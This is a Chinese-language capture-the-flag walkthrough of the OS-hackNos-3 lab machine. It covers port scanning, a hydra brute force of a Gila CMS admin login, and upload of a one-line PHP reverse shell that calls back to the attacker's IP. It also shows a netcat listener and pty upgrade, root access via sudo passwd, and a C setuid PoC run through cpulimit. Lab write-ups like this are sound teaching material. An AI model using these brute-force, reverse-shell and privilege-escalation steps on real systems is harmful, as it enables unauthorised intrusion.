Posts Os hackNos_3 walkthrough
Post
Cancel

Os hackNos_3 walkthrough

主机识别

arp-scan -l

网络拓扑

计算机IP
本机(Win10)192.168.36.234
Kali192.168.36.89
OS-hackNos-3192.168.36.226

扫描端口和版本信息

nmap -A 192.168.36.226

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(root💀kali)-[~]
└─# nmap -A 192.168.36.226
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-28 06:17 UTC
Nmap scan report for 192.168.36.226
Host is up (0.014s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 ce:16:a0:18:3f:74:e9:ad:cb:a9:39:90:11:b8:8a:2e (RSA)
|   256 9d:0e:a1:a3:1e:2c:4d:00:e8:87:d2:76:8c:be:71:9a (ECDSA)
|_  256 63:b3:75:98:de:c1:89:d9:92:4e:49:31:29:4b:c0:ad (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: WebSec
MAC Address: A8:66:7F:1B:19:D8 (Apple)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

输出结果清晰了然,只开启了2280端口,并且根据主页面中的这条You need extra WebSec提示信息,在/websec目录下看到网站内容。

使用whatweb工具收集信息,知道网站使用的是Gila CMS,下一步我们应该确定该CMS的版本,不过这比较困难(试过许多,但是找不到😢)

1
2
3
┌──(root💀kali)-[~]
└─# whatweb http://192.168.36.226/websec
http://192.168.36.226/websec/ [200 OK] Apache[2.4.41], Bootstrap, Country[RESERVED][ZZ], Email[contact@hacknos.com,your-email@your-domain.com], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[192.168.36.226], JQuery, MetaGenerator[Gila CMS], Script

之后只能试试暴力破解登录密码,不过在http://192.168.36.226/websec/admin/登录页面中发现登录名使用的是邮件地址,因此可以确定该地址是主页面中的contact@hacknos.com,那么我们只需要爆破密码即可。

这里,我们可以使用cewl工具来生成密码文件: cewl http://192.168.36.226/websec/ -w cewl_gila.txt,而不必使用很大的rockyou.txt密码文件。接下来就使用hydra工具进行密码爆破。

hydra工具使用方法:hydra -L <用户名列表> -P <密码列表> <IP地址> <表单参数> <登录失败消息>

1
2
3
4
5
6
7
8
9
10
┌──(root💀kali)-[~]
└─# hydra -l contact@hacknos.com -P cewl_gila.txt 192.168.36.226 http-post-form "/websec/admin:username=^USER^&password=^PASS^:Wrong email or password"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-28 08:00:24
[DATA] max 16 tasks per 1 server, overall 16 tasks, 53 login tries (l:1/p:53), ~4 tries per task
[DATA] attacking http-post-form://192.168.36.226:80/websec/admin:username=^USER^&password=^PASS^:Wrong email or password
[80][http-post-form] host: 192.168.36.226   login: contact@hacknos.com   password: Securityx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-28 08:00:37

至此我们得到了用户名和密码:contact@hacknos.com:Securityx,使用该账户和密码登录到后台,发现该CMS的版本号是1.10.9。之后在searchsploit搜索结果中发现该版本存在LFI漏洞,该漏洞点存在于/admin/fm/?f=../../中。通过阅读开发文档可以知道该路径/admin/fm是进行文件管理操作,在进行上传操作后文件保存在/assets/下,不过在上传具有反向shell的PHP文件前,需要更改.htaccess配置,在这里直接删除即可。

1
<?php $sock=fsockopen("192.168.36.89",6677);$proc=proc_open("/bin/bash -i",array(0=>$sock,1=>$sock),$pipes);?>

Getshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root💀kali)-[~]
└─# nc -lvp 6677
listening on [any] 6677 ...
192.168.36.226: inverse host lookup failed: Unknown host
connect to [192.168.36.89] from (UNKNOWN) [192.168.36.226] 59954
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ls
getshell.php
gila-logo.png
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@hacknos:/var/www/html/websec/assets$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

在查看该账户具备SUID权限命令时,返回中的信息提示需要进行查找,并且不太容易。

1
2
3
4
5
6
7
8
www-data@hacknos:/var/www/html/websec/assets$ sudo -l
sudo -l
Matching Defaults entries for www-data on hacknos:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on hacknos:
    (www-data) NOPASSWD: /not/easy/What/are/you/looking

不过在此之前,可以在/home/blackdevil/目录下得到第一个flag:

1
2
3
www-data@hacknos:/home/blackdevil$ cat user.txt
cat user.txt
bae11ce4f67af91fa58576c1da2aad4b

经过许久查找,在/var/local/目录下找到一个数据库文件database,将其中的数据经过解密得到一串字符:Security@x@。之后经过尝试知道该字符串是blackdevil账户的密码。

提权

切换到blackdevil账户后,发现该账户具备sudo权限,后续步骤就简单了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
blackdevil@hacknos:~$ sudo -l
sudo -l
[sudo] password for blackdevil: Security@x@

Matching Defaults entries for blackdevil on hacknos:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User blackdevil may run the following commands on hacknos:
    (ALL : ALL) ALL
blackdevil@hacknos:~$ sudo passwd root
sudo passwd root
New password: toor

Retype new password: toor

passwd: password updated successfully
blackdevil@hacknos:~$ su root
su root
Password: toor

root@hacknos:/home/blackdevil# cd /root
cd /root
root@hacknos:~# ls
ls
root.txt  snap
root@hacknos:~# cat root.txt
cat root.txt
########    #####     #####   ########         ########
##     ##  ##   ##   ##   ##     ##            ##     ##
##     ## ##     ## ##     ##    ##            ##     ##
########  ##     ## ##     ##    ##            ########
##   ##   ##     ## ##     ##    ##            ##   ##
##    ##   ##   ##   ##   ##     ##            ##    ##
##     ##   #####     #####      ##    ####### ##     ##


MD5-HASH: bae11ce4f67af91fa58576c1da2aad4b

Author: Rahul Gehlaut

Blog: www.hackNos.com

Linkedin: https://in.linkedin.com/in/rahulgehlaut

总结

  1. 在进行密码爆破前,使用的密码文件可以先用cewl工具生成,不行就使用rockyou.txt文件作为密码文件

  2. 在提权操作中,另一种操作就是利用cpulimit进行提权:

    1. Ubuntu编译PoC

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      
      #include<stdio.h>
      #include<unistd.h>
      #include<sys/types.h>
            
      int main()
      {
        setuid(0);
        setgid(0);
        system("/bin/bash");
        return 0;
      }
      // gcc poc.c -o poc
      // chmod 777 ./poc
      
    2. 执行PoC

      1
      
      www-data@hacknos:/tmp$ cpulimit -l 100 -f ./poc
      
This post is licensed under CC BY 4.0 by the author.